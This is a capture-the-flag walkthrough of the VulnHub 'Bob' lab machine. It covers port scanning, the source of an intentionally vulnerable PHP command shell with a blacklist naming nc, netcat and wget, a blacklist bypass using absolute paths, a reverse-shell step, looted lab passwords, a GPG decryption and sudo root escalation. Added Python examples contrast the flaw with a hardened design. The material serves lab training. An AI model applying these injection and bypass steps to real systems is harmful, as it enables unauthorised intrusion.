You can download it here: https://www.vulnhub.com/entry/bob-101,226/

Use nmap to do a thorough port scan of all TCP ports.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-11 04:29 EDT
Nmap scan report for 192.168.227.166
Host is up (0.00068s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 00:0C:29:90:AF:5E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.227.166

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.27 seconds

Checking the HTTP service (port 80), there is an interesting entry in robots.txt: /dev_shell.php


OK, RCE. After trying some commands, I found that some commands are filtered, like "ls", and commands must not contain ";".


But "dir" is not filtered.


There seems to be a backup file for the web shell; download it and audit the source.

<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>

OK: any ";" in the input is rejected, and otherwise the command is split on spaces and only its first word is checked against the blacklist "pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc".

The bypass is easy: use the absolute path of the binary instead of the bare command name, since the blacklist compares the first word verbatim.
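To make the weakness concrete from the defender's side, here is an added example (not code from the original post or the VM): a Python model of the PHP checks above beside a hypothetical hardened design that maps a keyword to a fixed argv and never hands a user string to a shell. The allowlist keywords and paths are assumptions for illustration.

```python
import shlex
import subprocess

# Blacklist copied from the dev_shell.php source shown above.
BAD_WORDS = {"pwd", "ls", "netcat", "ssh", "wget", "ping",
             "traceroute", "cat", "nc"}


def dev_shell_allows(command: str) -> bool:
    """Model of the page's PHP checks: reject any ';', then compare only
    the first space-separated word against the blacklist."""
    if ";" in command:
        return False
    first_word = command.strip().split(" ")[0]
    return first_word not in BAD_WORDS


# Hardened alternative (hypothetical, added here; not the page's code):
# the user picks a keyword, the server maps it to a fixed argv and runs it
# without a shell, so no user-controlled string is ever parsed by /bin/sh.
ALLOWED_COMMANDS = {
    "uptime": ["/usr/bin/uptime"],
    "disk": ["/bin/df", "-h"],
}


def resolve_allowed(command: str):
    """Return the fixed argv for an allow-listed keyword, else None."""
    try:
        words = shlex.split(command)
    except ValueError:          # unbalanced quotes and similar
        return None
    if len(words) != 1:         # no user-supplied arguments are accepted
        return None
    return ALLOWED_COMMANDS.get(words[0])


def run_allowed(command: str) -> str:
    """Execute only what resolve_allowed() returns; shell=False throughout."""
    argv = resolve_allowed(command)
    if argv is None:
        return "rejected"
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for c in ["dir", "ls", "/bin/ls", "dir; id"]:
        print(f"{c!r:12} blacklist allows: {dev_shell_allows(c)}"
              f"  allowlist argv: {resolve_allowed(c)}")
```

The point is that a first-word blacklist only recognises the exact spellings it lists, while an allowlist of fixed argv vectors leaves nothing for the attacker to rephrase.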

Get a reverse shell:


Walked around and gathered some information:

www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

www-data@Milburg-High:/home/elliot$ cat theadminisdumb.txt
cat theadminisdumb.txt
The admin is dumb,
In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that doesn’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what i’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password to

theadminisdumb

I hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.

I have a few credentials now:

jc:Qwerty

seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

elliot: theadminisdumb

But none of these accounts can do anything special. Checked for SUID files and also got nothing. The Debian distribution is quite new, no exploit available.

Found a ProFTPD 1.3.3c installation file in /home/bob/Downloads; that version has a backdoor, but from the nmap result the running ProFTPD is version 1.3.5b, and trying the backdoor also failed.

Found something suspicious in /home/bob/Documents:

www-data@Milburg-High:/home/bob/Documents$ ls
ls
Secret login.txt.gpg staff.txt
www-data@Milburg-High:/home/bob/Documents$ cat staff.txt
cat staff.txt
Seb:

Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him

James:

Does nothing
Pretty Lazy
Doesn't give a shit about his job

Elliot:

Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired
www-data@Milburg-High:/home/bob/Documents$ file login.txt.gpg
file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)
www-data@Milburg-High:/home/bob/Documents$ cd Secret
cd Secret
www-data@Milburg-High:/home/bob/Documents/Secret$ ls
ls
Keep_Out
www-data@Milburg-High:/home/bob/Documents/Secret$ cd K*
cd K*
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ ls
ls
Not_Porn Porn
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ cd No*
cd No*
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ ls
ls
No_Lookie_In_Here
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd N*
cd N*
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ ls
ls
notes.sh
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cd ..
cd ..
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd ..
cd ..
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ ls
ls
Not_Porn Porn
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ cd P*
cd P*
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Porn$ ls
ls
no_porn_4_u
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Porn$ cat n*
cat n*
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Porn$

notes.sh does not make any sense to me.

login.txt.gpg seems to contain login credentials, but it is encrypted; I tried to decrypt it but failed after several passphrase guesses.

Googled for a walkthrough and found out that this is the passphrase:

jc@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
<g --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
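The passphrase is the acrostic of the echo lines in notes.sh (Harry, Are, Right, People, ... spell HARPOCRATES), a common CTF hint pattern. As an added example, not part of the original post, this script extracts that acrostic from a copy of the notes.sh text shown above:

```python
import shlex

# Constructed copy of notes.sh as printed in the transcript above.
NOTES_SH = '''#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
'''


def echo_strings(script: str) -> list:
    """Return the text each 'echo' line would print, in order,
    using shell word splitting so the quoted strings come back intact."""
    out = []
    for line in script.splitlines():
        line = line.strip()
        if not line.startswith("echo "):
            continue
        out.append(" ".join(shlex.split(line)[1:]))
    return out


def acrostic(lines: list, skip_banner: str = "-=") -> str:
    """Join the first character of each printed line, ignoring the banner."""
    return "".join(s[0] for s in lines if s and not s.startswith(skip_banner))


if __name__ == "__main__":
    print(acrostic(echo_strings(NOTES_SH)))  # HARPOCRATES
```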

Use bob:b0bcat_ to log in to bob's account, and easily get a root shell with sudo /bin/bash.
